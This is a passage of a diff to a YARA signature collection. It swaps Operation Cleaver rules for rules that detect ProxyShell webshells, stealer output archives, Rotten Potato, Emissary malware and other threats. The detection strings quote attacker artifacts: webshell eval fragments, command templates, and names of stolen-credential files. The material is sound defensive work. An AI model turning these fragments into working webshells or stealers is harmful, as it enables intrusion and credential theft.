+		$g3 = "errorWord" ascii
+		$g4 = "Response.Redirect" ascii
+		$g5 = "function Page_Load" ascii
+		$g6 = "runat=\"server\"" ascii
+		$g7 = "Request[" ascii
+		$g8 = "eval/*" ascii
+		$s1 = "AppcacheVer" ascii
+		$s2 = "clientCode" ascii
+		$s3 = "LaTkWfI64XeDAXZS6pU1KrsvLAcGH7AZOQXjrFkT816RnFYJQR" ascii
 
 	condition:
-		1 of them
+		filesize < 1KB and ( 1 of ( $s* ) or 4 of ( $g* ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Antivirusdetector
+rule SIGNATURE_BASE_WEBSHELL_Mailbox_Export_PST_Proxyshell_Aug26 : FILE
 {
 	meta:
-		description = "Hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "25ab4eaf-eae7-5a55-bed4-42f621d5f06c"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L156-L171"
+		description = "Webshells generated by an Mailbox export to PST and stored as aspx: 570221043.aspx 689193944.aspx luifdecggoqmansn.aspx"
+		author = "Moritz Oettle"
+		id = "6aea414f-d27c-5202-84f8-b8620782fc90"
+		date = "2021-09-04"
+		modified = "2025-03-21"
+		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L148-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a8c2bbd27efab4c5579ea143abbd2f71c477dfd0ddbfb1741359e4d34140d9b"
-		score = 70
+		logic_hash = "07acbf74a4bf169fc128cd085759f33e89917e217703b3c6557ba5f954822fd4"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "getShadyProcess"
-		$s2 = "getSystemAntiviruses"
-		$s3 = "AntiVirusDetector"
+		$x1 = "!BDN"
+		$g1 = "Page language=" ascii
+		$g2 = "<%@ Page" ascii
+		$g3 = "Request.Item[" ascii
+		$g4 = "\"unsafe\");" ascii
+		$g5 = "<%eval(" ascii
+		$g6 = "script language=" ascii
+		$g7 = "Request[" ascii
+		$s1 = "gold8899" ascii
+		$s2 = "exec_code" ascii
+		$s3 = "orangenb" ascii
 
 	condition:
-		all of them
+		filesize < 500KB and $x1 at 0 and ( 1 of ( $s* ) or 3 of ( $g* ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Csext
+rule SIGNATURE_BASE_SUSP_IIS_Config_Proxyshell_Artifacts : FILE
 {
 	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "f865eae5-9988-5533-a004-e1694761a557"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L173-L188"
+		description = "Detects suspicious virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bde65d9e-b17d-5746-8d29-8419363d0511"
+		date = "2021-08-25"
+		modified = "2025-03-21"
+		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L181-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b4d070b71b685608ab84e757d01293749f2c017a6cd5b6ade6591264adc9836b"
+		logic_hash = "f2822a2b762c8e683c5e3a3f4a8232faa187b9a36182ea71e5286158b0e8115c"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "COM+ System Extentions"
-		$s2 = "csext.exe"
-		$s3 = "COM_Extentions_bin"
+		$a1 = "<site name=" ascii
+		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
+		$s1 = " physicalPath=\"C:\\ProgramData\\" ascii
 
 	condition:
-		all of them
+		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Kagent
+rule SIGNATURE_BASE_SUSP_IIS_Config_Virtualdir : FILE
 {
 	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "32d20495-eeed-5b2b-915d-cad60fa991f6"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L190-L204"
+		description = "Detects suspicious virtual directory configured in IIS pointing to a User folder"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cfe5ca5e-a0cc-5f60-84d2-1b0538e999c7"
+		date = "2021-08-25"
+		modified = "2022-09-17"
+		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L198-L218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd72ade7d40db830dc980def5107261f9cb41b713f9a0a1b2f41f7658b31653e"
-		score = 70
+		logic_hash = "0b9be085957f368bc1890c42e3f1e8b974eed8c77ecb4d2ba6add4d877a9b488"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "kill command is in last machine, going back"
-		$s2 = "message data length in B64: %d Bytes"
+		$a1 = "<site name=" ascii
+		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
+		$s2 = " physicalPath=\"C:\\Users\\" ascii
+		$fp1 = "Microsoft.Web.Administration" wide
+		$fp2 = "<virtualDirectory path=\"/\" physicalPath=\"C:\\Users\\admin\\"
 
 	condition:
-		all of them
+		filesize < 500KB and all of ( $a* ) and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Mimikatzwrapper
+rule SIGNATURE_BASE_SUSP_ASPX_Possibledropperartifact_Aug21 : FILE
 {
 	meta:
-		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "e9427e29-e581-5a5b-8f1d-4b9bfeec0946"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L206-L220"
+		description = "Detects an ASPX file with a non-ASCII header, often a result of MS Exchange drop techniques"
+		author = "Max Altgelt"
+		id = "52016598-74a1-53d6-812a-40b078ba0bb9"
+		date = "2021-08-23"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L220-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c643e248a9d8dd653ec99f8b59cdc7af945857a6a0321f93cc6983e85f84baba"
-		score = 70
+		logic_hash = "7e2fc61897ed859d5165aca7360d8a27891f842a7a8e4894af3926427ac95ceb"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "mimikatzWrapper"
-		$s2 = "get_mimikatz"
+		$s1 = "Page Language=" ascii nocase
+		$fp1 = "Page Language=\"java\"" ascii nocase
 
 	condition:
-		all of them
+		filesize < 500KB and not uint16( 0 ) == 0x4B50 and not uint16( 0 ) == 0x6152 and not uint16( 0 ) == 0x8b1f and not uint16( 0 ) == 0x5A4D and not uint16( 0 ) == 0xCFD0 and not uint16( 0 ) == 0xC3D4 and not uint16( 0 ) == 0x534D and all of ( $s* ) and not 1 of ( $fp* ) and ( ( ( uint8( 0 ) < 0x20 or uint8( 0 ) > 0x7E ) and uint8( 0 ) != 0x9 and uint8( 0 ) != 0x0D and uint8( 0 ) != 0x0A and uint8( 0 ) != 0xEF ) or ( ( uint8( 1 ) < 0x20 or uint8( 1 ) > 0x7E ) and uint8( 1 ) != 0x9 and uint8( 1 ) != 0x0D and uint8( 1 ) != 0x0A and uint8( 1 ) != 0xBB ) or ( ( uint8( 2 ) < 0x20 or uint8( 2 ) > 0x7E ) and uint8( 2 ) != 0x9 and uint8( 2 ) != 0x0D and uint8( 2 ) != 0x0A and uint8( 2 ) != 0xBF ) or ( ( uint8( 3 ) < 0x20 or uint8( 3 ) > 0x7E ) and uint8( 3 ) != 0x9 and uint8( 3 ) != 0x0D and uint8( 3 ) != 0x0A ) or ( ( uint8( 4 ) < 0x20 or uint8( 4 ) > 0x7E ) and uint8( 4 ) != 0x9 and uint8( 4 ) != 0x0D and uint8( 4 ) != 0x0A ) or ( ( uint8( 5 ) < 0x20 or uint8( 5 ) > 0x7E ) and uint8( 5 ) != 0x9 and uint8( 5 ) != 0x0D and uint8( 5 ) != 0x0A ) or ( ( uint8( 6 ) < 0x20 or uint8( 6 ) > 0x7E ) and uint8( 6 ) != 0x9 and uint8( 6 ) != 0x0D and uint8( 6 ) != 0x0A ) or ( ( uint8( 7 ) < 0x20 or uint8( 7 ) > 0x7E ) and uint8( 7 ) != 0x9 and uint8( 7 ) != 0x0D and uint8( 7 ) != 0x0A ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Pvz_In
+rule SIGNATURE_BASE_WEBSHELL_Proxyshell_Exploitation_Nov21_1
 {
 	meta:
-		description = "Parviz tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "dede12b3-f1dd-58ba-a860-829b2331b740"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L222-L236"
+		description = "Detects webshells dropped by DropHell malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "300eaadf-db0c-5591-84fc-abdf7cdd90c1"
+		date = "2021-11-01"
+		modified = "2025-03-21"
+		reference = "https://www.deepinstinct.com/blog/do-not-exchange-it-has-a-shell-inside"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L252-L266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eae778162be5dcfa0005bb237c5209e7103db3549e06706744f9ebdf04e192df"
-		score = 70
+		logic_hash = "d9812d3f53c346c4e318609e0c7de66811b27ffa7528a6ddeb6ac8436da59ef5"
+		score = 85
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
-		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+		$s01 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request[" ascii wide
+		$s02 = "new System.IO.MemoryStream()" ascii wide
+		$s03 = "Transform(" ascii wide
 
 	condition:
-		all of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Pvz_Out
+rule SIGNATURE_BASE_Emissary_APT_Malware_1 : FILE
 {
 	meta:
-		description = "Parviz tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "46b51bff-dfd9-5f56-897c-422112bc837b"
-		date = "2014-12-02"
+		description = "Detects Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ae6ff471-9255-52a3-89d2-452eb2556184"
+		date = "2016-01-02"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L238-L252"
+		reference = "http://goo.gl/V0epcf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_emissary.yar#L8-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "849300c32d2df42a011386903495d271810fd8a40c76d1a0c6295c059deb3a05"
-		score = 70
+		logic_hash = "cab20ac0c17dcc5cb9d0c9f4cffe47e5880acd9dee935cb0eb1ef59579a23f17"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
+		hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
+		hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
+		hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
+		hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
+		hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
+		hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
+		hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
+		hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
+		hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
+		hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
+		hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
+		hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
 
 	strings:
-		$s1 = "Network Connectivity Module" wide
-		$s2 = "OSPPSVC" wide
+		$s1 = "cmd.exe /c %s > %s" fullword ascii
+		$s2 = "execute cmd timeout." fullword ascii
+		$s3 = "rundll32.exe \"%s\",Setting" fullword ascii
+		$s4 = "DownloadFile - exception:%s." fullword ascii
+		$s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
+		$s6 = "UploadFile - EncryptBuffer Error" fullword ascii
+		$s7 = "WinDLL.dll" fullword wide
+		$s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
+		$s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and 3 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Wndtest
+rule SIGNATURE_BASE_MAL_Qbot_HTML_Smuggling_Indicators_Oct22_1 : FILE
 {
 	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "f8daa0a8-f0f0-5bf7-b9ab-eaf5335ff2b9"
-		date = "2014-12-02"
+		description = "Detects double encoded PKZIP headers as seen in HTML files used by QBot"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8034d6af-4dae-5ff6-b635-efb5175fe4d1"
+		date = "2022-10-07"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L254-L269"
+		reference = "https://twitter.com/ankit_anubhav/status/1578257383133876225?s=20&t=Bu3CCJCzImpTGOQX_KGsdA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_qbot_payloads.yar#L2-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b29c2b92b816bd0559695cb6b0b6e050ca8c5e256ec92448535fe9edf20757f"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "a5bd9eb72205f1398ec0b8773751309699b3267e0272dacf2728f8495c0c0ec2"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		hash1 = "4f384bcba31fda53e504d0a6c85cee0ce3ea9586226633d063f34c53ddeaca3f"
+		hash2 = "8e61c2b751682becb4c0337f5a79b2da0f5f19c128b162ec8058104b894cae9b"
+		hash3 = "c5d23d991ce3fbcf73b177bc6136d26a501ded318ccf409ca16f7c664727755a"
+		hash4 = "5072d91ee0d162c28452123a4d9986f3df6b3244e48bf87444ce88add29dd8ed"
+		hash5 = "ff4e21f788c36aabe6ba870cf3b10e258c2ba6f28a2d359a25d5a684c92a0cad"
 
 	strings:
-		$s1 = "[Alt]" wide
-		$s2 = "<< %s >>:" wide
-		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+		$sd1 = "VUVzREJCUUFBUUFJQ"
+		$sd2 = "VFc0RCQlFBQVFBSU"
+		$sd3 = "VRXNEQkJRQUFRQUlB"
+		$sdr1 = "QJFUUBFUUCJERzVUV"
+		$sdr2 = "USBFVQBFlQCR0cFV"
+		$sdr3 = "BlUQRFUQRJkQENXRV"
+		$st1 = "VlVWelJFSkNVVUZCVVVGSl"
+		$st2 = "ZVVnpSRUpDVVVGQlVVRkpR"
+		$st3 = "WVVZ6UkVKQ1VVRkJVVUZKU"
+		$st4 = "VkZjMFJDUWxGQlFWRkJTV"
+		$st5 = "ZGYzBSQ1FsRkJRVkZCU1"
+		$st6 = "WRmMwUkNRbEZCUVZGQlNV"
+		$st7 = "VlJYTkVRa0pSUVVGUlFVbE"
+		$st8 = "ZSWE5FUWtKUlFVRlJRVWxC"
+		$st9 = "WUlhORVFrSlJRVUZSUVVsQ"
+		$str1 = "UUpGVVVCRlVVQ0pFUnpWVV"
+		$str2 = "FKRlVVQkZVVUNKRVJ6VlVW"
+		$str3 = "RSkZVVUJGVVVDSkVSelZVV"
+		$str4 = "VVNCRlZRQkZsUUNSMGNGV"
+		$str5 = "VTQkZWUUJGbFFDUjBjRl"
+		$str6 = "VU0JGVlFCRmxRQ1IwY0ZW"
+		$str7 = "QmxVUVJGVVFSSmtRRU5YUl"
+		$str8 = "JsVVFSRlVRUkprUUVOWFJW"
+		$str9 = "CbFVRUkZVUVJKa1FFTlhSV"
+		$htm = "<html" ascii
+		$eml = "Content-Transfer-Encoding:" ascii
 
 	condition:
-		all of them
+		filesize < 10MB and ( ( 1 of ( $sd* ) and $htm and not $eml ) or ( 1 of ( $st* ) and $eml ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhcat
+rule SIGNATURE_BASE_SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1 : FILE
 {
 	meta:
-		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "e1f1bc48-b895-5e23-8ffd-b6ea9c8eb26f"
-		date = "2014-12-02"
+		description = "Detects typical stealer output files as created by RedLine or Racoon stealer"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c1cab3c3-c4f3-5a19-9ea3-9e4242238359"
+		date = "2022-09-17"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L271-L285"
+		reference = "https://twitter.com/cglyer/status/1570965878480719873"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_stealer_exfil_zip.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef5112532ba62cb2cf6a1c62b344d9146c5b8e2da50990c8cfd60d91b99bcb5e"
+		logic_hash = "197bb4b837cdd635f9340547b10a90c3a2a17f0113076c5ccbc0a91b7ae18eeb"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "8ce14c6b720281f43c75ce52e23ec13d08e7b2be1c5fbc2d704238f1fdd1a07f"
+		hash2 = "011c19d18fa446a2619b3a2512dacb2694e1da99a2c2ea7828769f1373ecd8fe"
+		hash3 = "418530bc7210f74ada8e7f16b41ea2033054e99f0c4423ce1d3ebf973c89e3a3"
+		hash4 = "aa6e2c8447f66527f9b6f4d54f57edc6cabe56095df94dc0656dca02e11356ab"
+		hash5 = "bbfb608061931565debac405ffebe3c4bb5dac8042443fe4e80aa03395955bd2"
+		hash6 = "c15107beecf3301fb12d140690034717e16bd5312a746e7ff43a7925e5533260"
 
 	strings:
-		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
-		$s2 = "ABC ( A Big Company )" wide fullword
+		$sa1 = "passwords.txt" ascii
+		$sa2 = "autofills/" ascii
+		$sa3 = "browsers/cookies/" ascii
+		$sa4 = "wallets/" ascii
+		$sb1 = "Passwords.txt" ascii
+		$sb2 = "Autofills/" ascii
+		$sb3 = "Browsers/Cookies/" ascii
+		$sb4 = "Wallets/" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 5000KB and ( 2 of ( $sa* ) or 2 of ( $sb* ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhlookup
+rule SIGNATURE_BASE_Rottenpotato_Potato : FILE
 {
 	meta:
-		description = "Hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "45ef9a90-db4c-59c3-b694-da3f539b118b"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L287-L300"
+		description = "Detects a component of privilege escalation tool Rotten Potato - file Potato.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4a12783c-f58a-518b-a80a-f09f146304cc"
+		date = "2017-02-07"
+		modified = "2022-12-21"
+		reference = "https://github.com/foxglovesec/RottenPotato"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rottenpotato.yar#L10-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9cc476e016708fd1604a63e2391057dc9dd0865448b62742ec596d6de54bf8f6"
-		score = 70
+		logic_hash = "79d2dfd5c2cfd12301c1924dce2ca2a2c3cc070565671c3e0cd69123d2245b1c"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "59cdbb21d9e487ca82748168682f1f7af3c5f2b8daee3a09544dd58cbf51b0d5"
 
 	strings:
-		$s1 = "zhLookUp.Properties"
+		$x1 = "Potato.exe -ip <ip>" fullword wide
+		$x2 = "-enable_httpserver true -enable_spoof true" fullword wide
+		$x3 = "/C schtasks.exe /Create /TN omg /TR" fullword wide
+		$x4 = "-enable_token true -enable_dce true" fullword wide
+		$x5 = "DNS lookup succeeds - UDP Exhaustion failed!" fullword wide
+		$x6 = "DNS lookup fails - UDP Exhaustion worked!" fullword wide
+		$x7 = "\\obj\\Release\\Potato.pdb" ascii
+		$x8 = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";" fullword wide
+		$s1 = "\"C:\\Windows\\System32\\cmd.exe\" /K start" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhmimikatz
+rule SIGNATURE_BASE_APT_MAL_HP_Ilo_Firmware_Dec21_1 : FILE
 {
 	meta:
-		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "fba8ab6e-3b61-53a1-b4df-178442e3cf24"
-		date = "2014-12-02"
+		description = "Detects suspicios ELF files with sections as described in malicious iLO Board analysis by AmnPardaz in December 2021"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7f5fa905-07a3-55da-b644-c5ab882b4a9d"
+		date = "2021-12-28"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L302-L316"
+		reference = "https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_ilo_board_elf.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d6ce5b3351d4b01abe0c2f614d002d4e96599b4bfa01138704a3fdf345d0786"
-		score = 70
+		logic_hash = "7e959d07d864a485b8cc7765f9e12869ff34747ab552e26244eb28f510d1051f"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "MimikatzRunner"
-		$s2 = "zhmimikatz"
+		$s1 = ".newelf.elf.text" ascii
+		$s2 = ".newelf.elf.libc.so.data" ascii
+		$s3 = ".newelf.elf.Initial.stack" ascii
+		$s4 = ".newelf.elf.libevlog.so.data" ascii
 
 	condition:
-		all of them
+		filesize < 5MB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Parviz_Developer
+rule SIGNATURE_BASE_VULN_Erlang_OTP_SSH_CVE_2025_32433_Apr25 : CVE_2025_32433 FILE
 {
 	meta:
-		description = "Parviz developer known from Operation Cleaver"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2bfa90a0-0495-5b21-98f7-5ed7ebc74b2d"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L318-L332"
+		description = "Detects binaries vulnerable to CVE-2025-32433 in Erlang/OTP SSH"
+		author = "Pierre-Henri Pezier, Florian Roth"
+		id = "2a149d28-9dba-546d-abfe-79c0ced34b12"
+		date = "2025-04-18"
+		modified = "2025-04-28"
+		reference = "https://www.upwind.io/feed/cve-2025-32433-critical-erlang-otp-ssh-vulnerability-cvss-10"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_erlang_otp_ssh_cve_2025_32433.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ae043ee5baa7361def79811350317baf54eb76cf15001a7785808dc7947fddc"
-		score = 70
+		logic_hash = "77d23956bd467a6eb56a91fa7a4bd939873363cd101a9d21b5b298c7b2e6c1ec"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2025-32433, FILE"
 
 	strings:
-		$s1 = "Users\\parviz\\documents\\" nocase
+		$a1 = { 46 4F 52 31 ?? ?? ?? ?? 42 45 41 4D }
+		$s1 = "ssh_connection.erl"
+		$fix1 = "chars_limit"
+		$fix2 = "allow    macro_log"
+		$fix3 = "logger"
+		$fix4 = "max_log_item_len"
 
 	condition:
-		$s1
+		filesize < 1MB and $a1 at 0 and $s1 and not 1 of ( $fix* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Ccproxy_Config
+rule SIGNATURE_BASE_MAL_ELF_Xlogin_Nov24_1 : FILE
 {
 	meta:
-		description = "CCProxy config known from Operation Cleaver"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c4d80a2a-2a32-585e-bc20-1c5118e4ee48"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L334-L352"
+		description = "Detects xlogin backdoor samples"
+		author = "Florian Roth"
+		id = "e8940660-ecf8-5616-9cb1-fc0a02d35689"
+		date = "2024-11-11"
+		modified = "2024-12-12"
+		reference = "https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_xlogin_nov24.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
